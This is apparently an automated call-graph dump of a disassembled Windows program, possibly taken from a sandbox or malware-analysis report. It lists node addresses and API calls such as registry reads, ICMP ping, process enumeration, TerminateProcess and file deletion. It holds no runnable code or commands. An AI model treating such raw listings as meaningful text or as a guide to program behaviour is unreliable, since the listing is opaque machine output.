99bd57 102896->102943 102899 9d4be6 RegQueryValueExW 102900 9d4c7c RegCloseKey 102899->102900 102901 9d4c03 102899->102901 102904 9953d2 102900->102904 102911 9d4c8e _wcslen 102900->102911 102902 9b017b 8 API calls 102901->102902 102903 9d4c1c 102902->102903 102949 99423c 102903->102949 102904->102880 102907 99655e 8 API calls 102907->102911 102908 9d4c44 102910 998577 8 API calls 102908->102910 102909 9d4c5e messages 102909->102900 102910->102909 102911->102904 102911->102907 102913 996a7c 8 API calls 102911->102913 102952 99b329 102911->102952 102913->102911 102914->102882 102958 9d22d0 102915->102958 102918 99b329 8 API calls 102919 9955c7 102918->102919 102960 995851 102919->102960 102921 9955d1 102921->102888 102923 9d22d0 __wsopen_s 102922->102923 102924 995245 GetFullPathNameW 102923->102924 102925 995267 102924->102925 102926 998577 8 API calls 102925->102926 102927 995285 102926->102927 102928 996b7c 102927->102928 102929 9d57fe 102928->102929 102930 996b93 102928->102930 102932 9b014b 8 API calls 102929->102932 102970 996ba4 102930->102970 102934 9d5808 _wcslen 102932->102934 102933 99538f 102937 996a7c 102933->102937 102935 9b017b 8 API calls 102934->102935 102936 9d5841 __fread_nolock 102935->102936 102938 996a8b 102937->102938 102942 996aac __fread_nolock 102937->102942 102941 9b017b 8 API calls 102938->102941 102939 9b014b 8 API calls 102940 99539e 102939->102940 102940->102895 102941->102942 102942->102939 102944 99bd71 102943->102944 102945 9953b0 RegOpenKeyExW 102943->102945 102946 9b014b 8 API calls 102944->102946 102945->102899 102945->102904 102947 99bd7b 102946->102947 102948 9b017b 8 API calls 102947->102948 102948->102945 102950 9b014b 8 API calls 102949->102950 102951 99424e RegQueryValueExW 102950->102951 102951->102908 102951->102909 102953 99b338 _wcslen 102952->102953 102954 9b017b 8 API calls 102953->102954 102955 99b360 __fread_nolock 102954->102955 102956 9b014b 8 API calls 102955->102956 102957 99b376 102956->102957 102957->102911 102959 9955a1 GetModuleFileNameW 102958->102959 102959->102918 102961 9d22d0 __wsopen_s 102960->102961 102962 99585e GetFullPathNameW 102961->102962 102963 995898 102962->102963 102964 99587d 102962->102964 102966 99bd57 8 API calls 102963->102966 102965 998577 8 API calls 102964->102965 102967 995889 102965->102967 102966->102967 102968 9955dc 8 API calls 102967->102968 102969 995895 102968->102969 102969->102921 102971 996bb4 _wcslen 102970->102971 102972 9d5860 102971->102972 102973 996bc7 102971->102973 102975 9b014b 8 API calls 102972->102975 102980 997d74 102973->102980 102977 9d586a 102975->102977 102976 996bd4 __fread_nolock 102976->102933 102978 9b017b 8 API calls 102977->102978 102979 9d589a __fread_nolock 102978->102979 102981 997d8a 102980->102981 102984 997d85 __fread_nolock 102980->102984 102982 9b017b 8 API calls 102981->102982 102983 9d6528 102981->102983 102982->102984 102983->102983 102984->102976 102985 99dd3d 102986 99dd63 102985->102986 102987 9e19c2 102985->102987 102988 99dead 102986->102988 102991 9b014b 8 API calls 102986->102991 102990 9e1a82 102987->102990 102995 9e1a26 102987->102995 102998 9e1a46 102987->102998 102992 9b017b 8 API calls 102988->102992 103068 a03fe1 81 API calls __wsopen_s 102990->103068 102997 99dd8d 102991->102997 103004 99dee4 __fread_nolock 102992->103004 102993 9e1a7d 103066 9ae6e8 280 API calls 102995->103066 102999 9b014b 8 API calls 102997->102999 102997->103004 102998->102993 103067 a03fe1 81 API calls __wsopen_s 102998->103067 103001 99dddb 102999->103001 103000 9b017b 8 API calls 103000->103004 103001->102995 103002 99de16 103001->103002 103042 9a0340 103002->103042 103004->102998 103004->103000 103005 99de29 103005->102993 103005->103004 103006 9e1aa5 103005->103006 103007 99de77 103005->103007 103009 99d526 103005->103009 103069 a03fe1 81 API calls __wsopen_s 103006->103069 103007->102988 103007->103009 103010 9b014b 8 API calls 103009->103010 103011 99d589 103010->103011 103027 99c32d 103011->103027 103014 9b014b 8 API calls 103020 99d66e messages 103014->103020 103015 99c3ab 8 API calls 103025 99d9ac messages 103015->103025 103016 99bed9 8 API calls 103016->103020 103019 9e1f79 103074 9f56ae 8 API calls messages 103019->103074 103020->103016 103020->103019 103022 9e1f94 103020->103022 103024 99d911 messages 103020->103024 103034 99c3ab 103020->103034 103070 99b4c8 103020->103070 103024->103015 103024->103025 103026 99d9c3 103025->103026 103065 9ae30a 8 API calls messages 103025->103065 103031 99c33d 103027->103031 103028 99c345 103028->103014 103029 9b014b 8 API calls 103029->103031 103030 99bf73 8 API calls 103030->103031 103031->103028 103031->103029 103031->103030 103033 99c32d 8 API calls 103031->103033 103075 99bed9 103031->103075 103033->103031 103035 99c3b9 103034->103035 103041 99c3e1 messages 103034->103041 103036 99c3c7 103035->103036 103038 99c3ab 8 API calls 103035->103038 103037 99c3cd 103036->103037 103039 99c3ab 8 API calls 103036->103039 103037->103041 103079 99c7e0 103037->103079 103038->103036 103039->103037 103041->103020 103060 9a0376 messages 103042->103060 103043 9b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103043->103060 103044 9e632b 103150 a03fe1 81 API calls __wsopen_s 103044->103150 103046 9a1695 103054 99bed9 8 API calls 103046->103054 103059 9a049d messages 103046->103059 103047 9b014b 8 API calls 103047->103060 103049 9e625a 103149 a03fe1 81 API calls __wsopen_s 103049->103149 103050 99bed9 8 API calls 103050->103060 103051 9e5cdb 103057 99bed9 8 API calls 103051->103057 103051->103059 103054->103059 103055 9b05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103055->103060 103057->103059 103058 99bf73 8 API calls 103058->103060 103059->103005 103060->103043 103060->103044 103060->103046 103060->103047 103060->103049 103060->103050 103060->103051 103060->103055 103060->103058 103060->103059 103061 9b0413 29 API calls pre_c_initialization 103060->103061 103062 9e6115 103060->103062 103064 9a0aae messages 103060->103064 103084 9a1990 103060->103084 103146 9a1e50 40 API calls messages 103060->103146 103061->103060 103147 a03fe1 81 API calls __wsopen_s 103062->103147 103148 a03fe1 81 API calls __wsopen_s 103064->103148 103065->103025 103066->102998 103067->102993 103068->102993 103069->102993 103071 99b4dc 103070->103071 103072 99b4d6 103070->103072 103071->103020 103072->103071 103073 99bed9 8 API calls 103072->103073 103073->103071 103074->103022 103076 99befc __fread_nolock 103075->103076 103077 99beed 103075->103077 103076->103031 103077->103076 103078 9b017b 8 API calls 103077->103078 103078->103076 103081 99c7eb messages 103079->103081 103080 99c826 messages 103080->103041 103081->103080 103083 9ae322 8 API calls messages 103081->103083 103083->103080 103085 9a1a2e 103084->103085 103086 9a19b6 103084->103086 103087 9e6a4d 103085->103087 103103 9a1a3d 103085->103103 103088 9e6b60 103086->103088 103089 9a19c3 103086->103089 103091 9e6a58 103087->103091 103092 9e6b54 103087->103092 103167 a185db 280 API calls 2 library calls 103088->103167 103097 9e6b84 103089->103097 103098 9a19cd 103089->103098 103165 9ab35c 280 API calls 103091->103165 103166 a03fe1 81 API calls __wsopen_s 103092->103166 103093 9a0340 280 API calls 103093->103103 103096 9e6bb5 103099 9e6be2 103096->103099 103100 9e6bc0 103096->103100 103097->103096 103101 9e6b9c 103097->103101 103107 99bed9 8 API calls 103098->103107 103128 9a19e0 messages 103098->103128 103170 a160e6 103099->103170 103169 a185db 280 API calls 2 library calls 103100->103169 103168 a03fe1 81 API calls __wsopen_s 103101->103168 103102 9e6979 103164 a03fe1 81 API calls __wsopen_s 103102->103164 103103->103093 103103->103102 103106 9a1bb5 103103->103106 103112 9e6908 103103->103112 103121 9a1ba9 103103->103121 103103->103128 103131 9a1af4 103103->103131 103106->103060 103107->103128 103110 9e6dd9 103116 9e6e0f 103110->103116 103268 a181ce 65 API calls 103110->103268 103163 a03fe1 81 API calls __wsopen_s 103112->103163 103114 9e6c81 103242 a01ad8 8 API calls 103114->103242 103119 99b4c8 8 API calls 103116->103119 103117 9e6db7 103245 998ec0 103117->103245 103144 9a1a23 messages 103119->103144 103120 99bed9 8 API calls 103120->103128 103121->103106 103162 a03fe1 81 API calls __wsopen_s 103121->103162 103123 9e6ded 103126 998ec0 52 API calls 103123->103126 103125 9e6c08 103177 a0148b 103125->103177 103141 9e6df5 _wcslen 103126->103141 103128->103110 103128->103144 103244 a1808f 53 API calls __wsopen_s 103128->103244 103129 9e6c93 103243 99bd07 8 API calls 103129->103243 103130 9e691d messages 103130->103102 103143 9a1b62 messages 103130->103143 103130->103144 103131->103121 103151 9a1ca0 103131->103151 103135 9a1b55 103135->103121 103135->103143 103136 9e6dbf _wcslen 103136->103110 103139 99b4c8 8 API calls 103136->103139 103138 9e6c9c 103145 a0148b 8 API calls 103138->103145 103139->103110 103141->103116 103142 99b4c8 8 API calls 103141->103142 103142->103116 103143->103120 103143->103128 103143->103144 103144->103060 103145->103128 103146->103060 103147->103064 103148->103059 103149->103059 103150->103059 103152 9a1cb2 103151->103152 103156 9a1cbb 103152->103156 103269 9ab7a2 8 API calls 103152->103269 103154 9a1d70 103154->103135 103155 9b014b 8 API calls 103157 9a1dd9 103155->103157 103156->103154 103156->103155 103158 9b014b 8 API calls 103157->103158 103159 9a1de2 103158->103159 103160 99b329 8 API calls 103159->103160 103161 9a1df1 103160->103161 103161->103135 103162->103144 103163->103130 103164->103128 103165->103143 103166->103088 103167->103128 103168->103144 103169->103128 103171 a16101 103170->103171 103172 9e6bed 103170->103172 103173 9b017b 8 API calls 103171->103173 103172->103114 103172->103125 103175 a16123 103173->103175 103174 9b014b 8 API calls 103174->103175 103175->103172 103175->103174 103270 a01400 8 API calls 103175->103270 103178 9e6c32 103177->103178 103179 a01499 103177->103179 103181 9a2b20 103178->103181 103179->103178 103180 9b014b 8 API calls 103179->103180 103180->103178 103182 9a2b61 103181->103182 103183 9a2fc0 103182->103183 103184 9a2b86 103182->103184 103422 9b05b2 5 API calls __Init_thread_wait 103183->103422 103185 9e7bd8 103184->103185 103186 9a2ba0 103184->103186 103385 a17af9 103185->103385 103271 9a3160 103186->103271 103190 9a2fca 103193 99b329 8 API calls 103190->103193 103199 9a300b 103190->103199 103192 9e7be4 103192->103128 103202 9a2fe4 103193->103202 103194 9a3160 9 API calls 103195 9a2bc6 103194->103195 103196 9a2bfc 103195->103196 103195->103199 103198 9e7bfd 103196->103198 103223 9a2c18 __fread_nolock 103196->103223 103197 9e7bed 103197->103128 103426 a03fe1 81 API calls __wsopen_s 103198->103426 103199->103197 103201 99b4c8 8 API calls 103199->103201 103203 9a3049 103201->103203 103423 9b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103202->103423 103424 9ae6e8 280 API calls 103203->103424 103206 9e7c15 103427 a03fe1 81 API calls __wsopen_s 103206->103427 103208 9a2d3f 103209 9e7c78 103208->103209 103210 9a2d4c 103208->103210 103429 a161a2 53 API calls _wcslen 103209->103429 103211 9a3160 9 API calls 103210->103211 103213 9a2d59 103211->103213 103217 9a3160 9 API calls 103213->103217 103230 9a2dd7 messages 103213->103230 103214 9b014b 8 API calls 103214->103223 103215 9b017b 8 API calls 103215->103223 103216 9a3082 103425 9afe39 8 API calls 103216->103425 103228 9a2d73 103217->103228 103219 9a2f2d 103219->103128 103221 9a30bd 103221->103128 103222 9a0340 280 API calls 103222->103223 103223->103203 103223->103206 103223->103208 103223->103214 103223->103215 103223->103222 103225 9e7c59 103223->103225 103223->103230 103224 9a2e8b messages 103224->103219 103421 9ae322 8 API calls messages 103224->103421 103428 a03fe1 81 API calls __wsopen_s 103225->103428 103226 9a3160 9 API calls 103226->103230 103228->103230 103231 99bed9 8 API calls 103228->103231 103230->103216 103230->103224 103230->103226 103281 a233a3 103230->103281 103286 a0d653 103230->103286 103306 a10fb8 103230->103306 103331 a0669f 103230->103331 103336 a19fe8 103230->103336 103339 a0664c 103230->103339 103346 9aac3e 103230->103346 103365 a1ad47 103230->103365 103370 a1a5b2 103230->103370 103376 a0f94a 103230->103376 103430 a03fe1 81 API calls __wsopen_s 103230->103430 103231->103230 103242->103129 103243->103138 103244->103117 103246 998ed2 103245->103246 103247 998ed5 103245->103247 103246->103136 103248 998f0b 103247->103248 103249 998edd 103247->103249 103250 9d6b1f 103248->103250 103253 998f1d 103248->103253 103261 9d6a38 103248->103261 103888 9b5536 26 API calls 103249->103888 103891 9b54f3 26 API calls 103250->103891 103889 9afe6f 51 API calls 103253->103889 103254 998eed 103258 9b014b 8 API calls 103254->103258 103255 9d6b37 103255->103255 103259 998ef7 103258->103259 103262 99b329 8 API calls 103259->103262 103260 9d6ab1 103890 9afe6f 51 API calls 103260->103890 103261->103260 103263 9b017b 8 API calls 103261->103263 103262->103246 103264 9d6a81 103263->103264 103265 9b014b 8 API calls 103264->103265 103266 9d6aa8 103265->103266 103267 99b329 8 API calls 103266->103267 103267->103260 103268->103123 103269->103156 103270->103175 103272 9a31a1 103271->103272 103277 9a317d 103271->103277 103431 9b05b2 5 API calls __Init_thread_wait 103272->103431 103274 9a31ab 103274->103277 103432 9b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103274->103432 103276 9a9f47 103280 9a2bb0 103276->103280 103434 9b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103276->103434 103277->103280 103433 9b05b2 5 API calls __Init_thread_wait 103277->103433 103280->103194 103435 a235cc 103281->103435 103283 a233b1 103284 99b4c8 8 API calls 103283->103284 103285 a233f9 103284->103285 103285->103230 103287 a0d678 103286->103287 103288 a0d66d 103286->103288 103290 998ec0 52 API calls 103287->103290 103457 99c98d 39 API calls 103288->103457 103291 a0d68a 103290->103291 103452 a0c783 103291->103452 103307 a10fe1 103306->103307 103308 a1100f WSAStartup 103307->103308 103471 99c98d 39 API calls 103307->103471 103310 a11054 103308->103310 103321 a11023 messages 103308->103321 103458 9ac1f6 103310->103458 103312 a10ffc 103312->103308 103472 99c98d 39 API calls 103312->103472 103314 998ec0 52 API calls 103316 a11069 103314->103316 103463 9af9d4 WideCharToMultiByte 103316->103463 103317 a1100b 103317->103308 103319 a11075 inet_addr gethostbyname 103320 a11093 IcmpCreateFile 103319->103320 103319->103321 103320->103321 103322 a110d3 103320->103322 103321->103230 103323 9b017b 8 API calls 103322->103323 103324 a110ec 103323->103324 103325 99423c 8 API calls 103324->103325 103326 a110f7 103325->103326 103327 a11102 IcmpSendEcho 103326->103327 103328 a1112b IcmpSendEcho 103326->103328 103329 a1114c 103327->103329 103328->103329 103330 a11212 IcmpCloseHandle WSACleanup 103329->103330 103330->103321 103332 998ec0 52 API calls 103331->103332 103333 a066b2 103332->103333 103475 9fe472 lstrlenW 103333->103475 103335 a066bc 103335->103230 103480 a189b6 103336->103480 103338 a19ff8 103338->103230 103340 998ec0 52 API calls 103339->103340 103341 a06662 103340->103341 103615 9fdc54 103341->103615 103343 a0666a 103344 a0666e GetLastError 103343->103344 103345 a06683 103343->103345 103344->103345 103345->103230 103347 998ec0 52 API calls 103346->103347 103348 9aac68 103347->103348 103708 9abc58 103348->103708 103350 9aac7f 103360 9ab09b _wcslen 103350->103360 103727 99c98d 39 API calls 103350->103727 103354 9abbbe 43 API calls 103354->103360 103357 996c03 8 API calls 103357->103360 103358 9ab1fb 103358->103230 103359 998ec0 52 API calls 103359->103360 103360->103354 103360->103357 103360->103358 103360->103359 103361 998577 8 API calls 103360->103361 103364 99c98d 39 API calls 103360->103364 103713 99396b 103360->103713 103723 993907 103360->103723 103728 9b4d98 103360->103728 103738 997ad5 103360->103738 103743 99ad40 8 API calls __fread_nolock 103360->103743 103744 997b1a 8 API calls 103360->103744 103361->103360 103364->103360 103366 998ec0 52 API calls 103365->103366 103367 a1ad63 103366->103367 103785 9fdd87 CreateToolhelp32Snapshot Process32FirstW 103367->103785 103369 a1ad72 103369->103230 103371 a1a5c5 103370->103371 103372 998ec0 52 API calls 103371->103372 103375 a1a5d4 103371->103375 103373 a1a632 103372->103373 103841 a018a9 103373->103841 103375->103230 103377 9b017b 8 API calls 103376->103377 103378 a0f95b 103377->103378 103379 99423c 8 API calls 103378->103379 103380 a0f965 103379->103380 103381 998ec0 52 API calls 103380->103381 103382 a0f97c GetEnvironmentVariableW 103381->103382 103882 a0160f 8 API calls 103382->103882 103384 a0f999 messages 103384->103230 103386 a17b52 103385->103386 103387 a17b38 103385->103387 103389 a160e6 8 API calls 103386->103389 103883 a03fe1 81 API calls __wsopen_s 103387->103883 103391 a17b5d 103389->103391 103390 a17b4a 103390->103192 103392 9a0340 279 API calls 103391->103392 103393 a17bc1 103392->103393 103393->103390 103394 a17c5c 103393->103394 103398 a17c03 103393->103398 103395 a17cb0 103394->103395 103396 a17c62 103394->103396 103395->103390 103397 998ec0 52 API calls 103395->103397 103884 a01ad8 8 API calls 103396->103884 103399 a17cc2 103397->103399 103403 a0148b 8 API calls 103398->103403 103401 99c2c9 8 API calls 103399->103401 103405 a17ce6 CharUpperBuffW 103401->103405 103402 a17c85 103885 99bd07 8 API calls 103402->103885 103404 a17c3b 103403->103404 103407 9a2b20 279 API calls 103404->103407 103408 a17d00 103405->103408 103407->103390 103409 a17d53 103408->103409 103410 a17d07 103408->103410 103411 998ec0 52 API calls 103409->103411 103414 a0148b 8 API calls 103410->103414 103412 a17d5b 103411->103412 103886 9aaa65 9 API calls 103412->103886 103415 a17d35 103414->103415 103416 9a2b20 279 API calls 103415->103416 103416->103390 103417 a17d65 103417->103390 103418 998ec0 52 API calls 103417->103418 103419 a17d80 103418->103419 103887 99bd07 8 API calls 103419->103887 103421->103224 103422->103190 103423->103199 103424->103216 103425->103221 103426->103230 103427->103230 103428->103230 103429->103228 103430->103230 103431->103274 103432->103277 103433->103276 103434->103280 103441 a23574 103435->103441 103438 a235ed timeGetTime 103438->103283 103442 99b4c8 8 API calls 103441->103442 103443 a2358f 103442->103443 103444 a2359b 103443->103444 103445 a235b9 103443->103445 103446 998ec0 52 API calls 103444->103446 103447 998577 8 API calls 103445->103447 103448 a235a8 103446->103448 103449 a235b7 103447->103449 103448->103449 103450 99bed9 8 API calls 103448->103450 103449->103438 103451 99c98d 39 API calls 103449->103451 103450->103449 103451->103438 103453 99b329 8 API calls 103452->103453 103454 a0c7ae 103453->103454 103455 99b329 8 API calls 103454->103455 103456 a0c7b9 103455->103456 103457->103287 103459 9b017b 8 API calls 103458->103459 103460 9ac209 103459->103460 103461 9b014b 8 API calls 103460->103461 103462 9ac215 103461->103462 103462->103314 103464 9af9fe 103463->103464 103465 9afa35 103463->103465 103467 9b017b 8 API calls 103464->103467 103474 9afe8a 8 API calls 103465->103474 103468 9afa05 WideCharToMultiByte 103467->103468 103473 9afa3e 8 API calls __fread_nolock 103468->103473 103470 9afa29 103470->103319 103471->103312 103472->103317 103473->103470 103474->103470 103476 9fe4ba 103475->103476 103477 9fe490 GetFileAttributesW 103475->103477 103476->103335 103477->103476 103478 9fe49c FindFirstFileW 103477->103478 103478->103476 103479 9fe4ad FindClose 103478->103479 103479->103476 103481 998ec0 52 API calls 103480->103481 103482 a189ed 103481->103482 103505 a18a32 messages 103482->103505 103518 a19730 103482->103518 103484 a18cde 103485 a18eac 103484->103485 103490 a18cec 103484->103490 103575 a19941 59 API calls 103485->103575 103488 a18ebb 103489 a18ec7 103488->103489 103488->103490 103489->103505 103531 a188e3 103490->103531 103491 998ec0 52 API calls 103508 a18aa6 103491->103508 103496 a18d25 103545 9affe0 103496->103545 103499 a18d45 103574 a03fe1 81 API calls __wsopen_s 103499->103574 103500 a18d5f 103550 997e12 103500->103550 103503 a18d50 GetCurrentProcess TerminateProcess 103503->103500 103505->103338 103508->103484 103508->103491 103508->103505 103572 9f4ad3 8 API calls __fread_nolock 103508->103572 103573 a18f7a 41 API calls _strftime 103508->103573 103509 9a1ca0 8 API calls 103511 a18d9e 103509->103511 103510 a18f22 103510->103505 103513 a18f36 FreeLibrary 103510->103513 103514 a195d8 74 API calls 103511->103514 103512 9a1ca0 8 API calls 103517 a18daf 103512->103517 103513->103505 103514->103517 103516 99b4c8 8 API calls 103516->103517 103517->103510 103517->103512 103517->103516 103561 a195d8 103517->103561 103519 99c2c9 8 API calls 103518->103519 103520 a1974b CharLowerBuffW 103519->103520 103576 9f9805 103520->103576 103524 99bf73 8 API calls 103525 a19787 103524->103525 103583 99acc0 103525->103583 103527 a1979b 103528 99adf4 8 API calls 103527->103528 103530 a197a5 _wcslen 103528->103530 103529 a198bb _wcslen 103529->103508 103530->103529 103595 a18f7a 41 API calls _strftime 103530->103595 103532 a188fe 103531->103532 103536 a18949 103531->103536 103533 9b017b 8 API calls 103532->103533 103534 a18920 103533->103534 103535 9b014b 8 API calls 103534->103535 103534->103536 103535->103534 103537 a19af3 103536->103537 103538 a19d08 messages 103537->103538 103543 a19b17 _strcat _wcslen ___std_exception_copy 103537->103543 103538->103496 103539 99ca5b 39 API calls 103539->103543 103540 99c63f 39 API calls 103540->103543 103541 99c98d 39 API calls 103541->103543 103542 998ec0 52 API calls 103542->103543 103543->103538 103543->103539 103543->103540 103543->103541 103543->103542 103599 9ff8c5 10 API calls _wcslen 103543->103599 103546 9afff5 103545->103546 103547 9b008d Sleep 103546->103547 103548 9b007b FindCloseChangeNotification 103546->103548 103549 9b005b 103546->103549 103547->103549 103548->103549 103549->103499 103549->103500 103551 997e1a 103550->103551 103552 9b014b 8 API calls 103551->103552 103553 997e28 103552->103553 103600 998445 103553->103600 103556 998470 103603 99c760 103556->103603 103558 9b017b 8 API calls 103560 99851c 103558->103560 103559 998480 103559->103558 103559->103560 103560->103509 103560->103517 103562 a195f0 103561->103562 103566 a1960c 103561->103566 103563 a196c1 103562->103563 103564 a195f7 103562->103564 103565 a19618 103562->103565 103562->103566 103614 a0169e 72 API calls messages 103563->103614 103611 9ff4e8 10 API calls _strlen 103564->103611 103613 996c03 8 API calls 103565->103613 103566->103517 103570 a19601 103612 996c03 8 API calls 103570->103612 103572->103508 103573->103508 103574->103503 103575->103488 103577 9f9825 _wcslen 103576->103577 103579 9f985a 103577->103579 103580 9f9919 103577->103580 103582 9f9914 103577->103582 103579->103582 103596 9ae36b 41 API calls 103579->103596 103580->103582 103597 9ae36b 41 API calls 103580->103597 103582->103524 103582->103530 103584 99accf 103583->103584 103586 99ace1 103583->103586 103585 99c2c9 8 API calls 103584->103585 103593 99acda __fread_nolock 103584->103593 103587 9e05a3 __fread_nolock 103585->103587 103586->103584 103588 9e0557 103586->103588 103589 99ad07 103586->103589 103590 9b014b 8 API calls 103588->103590 103598 9988e8 8 API calls 103589->103598 103592 9e0561 103590->103592 103594 9b017b 8 API calls 103592->103594 103593->103527 103594->103584 103595->103529 103596->103579 103597->103580 103598->103593 103599->103543 103601 9b014b 8 API calls 103600->103601 103602 997e30 103601->103602 103602->103556 103604 99c76b 103603->103604 103605 9e1285 103604->103605 103610 99c773 messages 103604->103610 103606 9b014b 8 API calls 103605->103606 103608 9e1291 103606->103608 103607 99c77a 103607->103559 103609 99c7e0 8 API calls 103609->103610 103610->103607 103610->103609 103611->103570 103612->103566 103613->103566 103614->103566 103616 99bf73 8 API calls 103615->103616 103617 9fdc73 103616->103617 103618 99bf73 8 API calls 103617->103618 103619 9fdc7c 103618->103619 103620 99bf73 8 API calls 103619->103620 103621 9fdc85 103620->103621 103622 995851 9 API calls 103621->103622 103623 9fdc90 103622->103623 103640 9feab0 GetFileAttributesW 103623->103640 103626 9fdcab 103642 99568e 103626->103642 103627 996b7c 8 API calls 103627->103626 103629 9fdcbf FindFirstFileW 103630 9fdcde 103629->103630 103631 9fdd4b FindClose 103629->103631 103630->103631 103635 9fdce2 103630->103635 103636 9fdd56 103631->103636 103632 9fdd26 FindNextFileW 103632->103630 103632->103635 103633 99bed9 8 API calls 103633->103635 103635->103630 103635->103632 103635->103633 103637 996b7c 8 API calls 103635->103637 103684 997bb5 103635->103684 103636->103343 103638 9fdd17 DeleteFileW 103637->103638 103638->103632 103639 9fdd42 FindClose 103638->103639 103639->103636 103641 9fdc99 103640->103641 103641->103626 103641->103627 103643 99bf73 8 API calls 103642->103643 103644 9956a4 103643->103644 103645 99bf73 8 API calls 103644->103645 103646 9956ac 103645->103646 103647 99bf73 8 API calls 103646->103647 103648 9956b4 103647->103648 103649 99bf73 8 API calls 103648->103649 103650 9956bc 103649->103650 103651 9956f0 103650->103651 103652 9d4da1 103650->103652 103654 99acc0 8 API calls 103651->103654 103653 99bed9 8 API calls 103652->103653 103655 9d4daa 103653->103655 103656 9956fe 103654->103656 103657 99bd57 8 API calls 103655->103657 103658 99adf4 8 API calls 103656->103658 103661 995733 103657->103661 103659 995708 103658->103659 103660 99acc0 8 API calls 103659->103660 103659->103661 103664 995729 103660->103664 103662 995754 103661->103662 103676 995778 103661->103676 103683 9d4dcc 103661->103683 103662->103676 103693 99655e 103662->103693 103663 99acc0 8 API calls 103665 995789 103663->103665 103666 99adf4 8 API calls 103664->103666 103669 99579f 103665->103669 103672 99bed9 8 API calls 103665->103672 103666->103661 103668 9957b3 103673 9957be 103668->103673 103677 99bed9 8 API calls 103668->103677 103669->103668 103674 99bed9 8 API calls 103669->103674 103670 995761 103675 99acc0 8 API calls 103670->103675 103670->103676 103671 998577 8 API calls 103680 9d4e8c 103671->103680 103672->103669 103678 99bed9 8 API calls 103673->103678 103681 9957c9 103673->103681 103674->103668 103675->103676 103676->103663 103677->103673 103678->103681 103679 99655e 8 API calls 103679->103680 103680->103676 103680->103679 103696 99ad40 8 API calls __fread_nolock 103680->103696 103681->103629 103683->103671 103685 9d641d 103684->103685 103686 997bc7 103684->103686 103707 9f13c8 8 API calls __fread_nolock 103685->103707 103697 997bd8 103686->103697 103689 997bd3 103689->103635 103690 9d6427 103691 9d6433 103690->103691 103692 99bed9 8 API calls 103690->103692 103692->103691 103694 99c2c9 8 API calls 103693->103694 103695 996569 103694->103695 103695->103670 103696->103680 103698 997be7 103697->103698 103703 997c1b __fread_nolock 103697->103703 103699 9d644e 103698->103699 103700 997c0e 103698->103700 103698->103703 103702 9b014b 8 API calls 103699->103702 103701 997d74 8 API calls 103700->103701 103701->103703 103704 9d645d 103702->103704 103703->103689 103705 9b017b 8 API calls 103704->103705 103706 9d6491 __fread_nolock 103705->103706 103707->103690 103709 9b014b 8 API calls 103708->103709 103710 9abc65 103709->103710 103711 99b329 8 API calls 103710->103711 103712 9abc70 103711->103712 103712->103350 103714 993996 ___scrt_fastfail 103713->103714 103745 995f32 103714->103745 103718 9d40cd Shell_NotifyIconW 103719 993a3a Shell_NotifyIconW 103749 9961a9 103719->103749 103720 993a1c 103720->103718 103720->103719 103722 993a50 103722->103360 103724 993969 103723->103724 103725 993919 ___scrt_fastfail 103723->103725 103724->103360 103726 993938 Shell_NotifyIconW 103725->103726 103726->103724 103727->103360 103729 9b4e1b 103728->103729 103730 9b4da6 103728->103730 103784 9b4e2d 40 API calls 3 library calls 103729->103784 103737 9b4dcb 103730->103737 103782 9bf649 20 API calls _free 103730->103782 103733 9b4e28 103733->103360 103734 9b4db2 103783 9c2b5c 26 API calls __cftof 103734->103783 103736 9b4dbd 103736->103360 103737->103360 103739 9b017b 8 API calls 103738->103739 103740 997afa 103739->103740 103741 9b014b 8 API calls 103740->103741 103742 997b08 103741->103742 103742->103360 103743->103360 103744->103360 103746 995f4e 103745->103746 103747 9939eb 103745->103747 103746->103747 103748 9d5070 DestroyIcon 103746->103748 103747->103720 103779 9fd11f 42 API calls _strftime 103747->103779 103748->103747 103750 9961c6 103749->103750 103769 9962a8 103749->103769 103751 997ad5 8 API calls 103750->103751 103752 9961d4 103751->103752 103753 9d5278 LoadStringW 103752->103753 103754 9961e1 103752->103754 103757 9d5292 103753->103757 103755 998577 8 API calls 103754->103755 103756 9961f6 103755->103756 103758 996203 103756->103758 103765 9d52ae 103756->103765 103760 99bed9 8 API calls 103757->103760 103763 996229 ___scrt_fastfail 103757->103763 103758->103757 103759 99620d 103758->103759 103761 996b7c 8 API calls 103759->103761 103760->103763 103762 99621b 103761->103762 103764 997bb5 8 API calls 103762->103764 103767 99628e Shell_NotifyIconW 103763->103767 103764->103763 103765->103763 103766 9d52f1 103765->103766 103768 99bf73 8 API calls 103765->103768 103781 9afe6f 51 API calls 103766->103781 103767->103769 103770 9d52d8 103768->103770 103769->103722 103780 9fa350 9 API calls 103770->103780 103773 9d52e3 103775 997bb5 8 API calls 103773->103775 103774 9d5310 103776 996b7c 8 API calls 103774->103776 103775->103766 103777 9d5321 103776->103777 103778 996b7c 8 API calls 103777->103778 103778->103763 103779->103720 103780->103773 103781->103774 103782->103734 103783->103736 103784->103733 103795 9fe80e 103785->103795 103787 9fde86 FindCloseChangeNotification 103787->103369 103788 9fddd4 Process32NextW 103788->103787 103790 9fddcd 103788->103790 103789 99bf73 8 API calls 103789->103790 103790->103787 103790->103788 103790->103789 103791 99b329 8 API calls 103790->103791 103792 99568e 8 API calls 103790->103792 103793 997bb5 8 API calls 103790->103793 103801 9ae36b 41 API calls 103790->103801 103791->103790 103792->103790 103793->103790 103800 9fe819 103795->103800 103796 9fe830 103803 9b666b 103796->103803 103799 9fe836 103799->103790 103800->103796 103800->103799 103802 9b6722 GetStringTypeW _strftime 103800->103802 103801->103790 103802->103800 103804 9b6684 _strftime 103803->103804 103807 9b5f80 103804->103807 103825 9b65c9 103807->103825 103809 9b5fd7 103834 9b4d15 38 API calls 2 library calls 103809->103834 103810 9b5faa 103832 9bf649 20 API calls _free 103810->103832 103811 9b5f93 103811->103809 103811->103810 103824 9b5fba 103811->103824 103814 9b5faf 103833 9c2b5c 26 API calls __cftof 103814->103833 103817 9b5fe2 103818 9b600b 103817->103818 103835 9c3a62 GetStringTypeW 103817->103835 103820 9b6215 __aulldvrm 103818->103820 103836 9b659d 26 API calls 2 library calls 103818->103836 103837 9b659d 26 API calls 2 library calls 103820->103837 103822 9b64f6 103822->103824 103838 9bf649 20 API calls _free 103822->103838 103824->103799 103826 9b65ce 103825->103826 103827 9b65e1 103825->103827 103839 9bf649 20 API calls 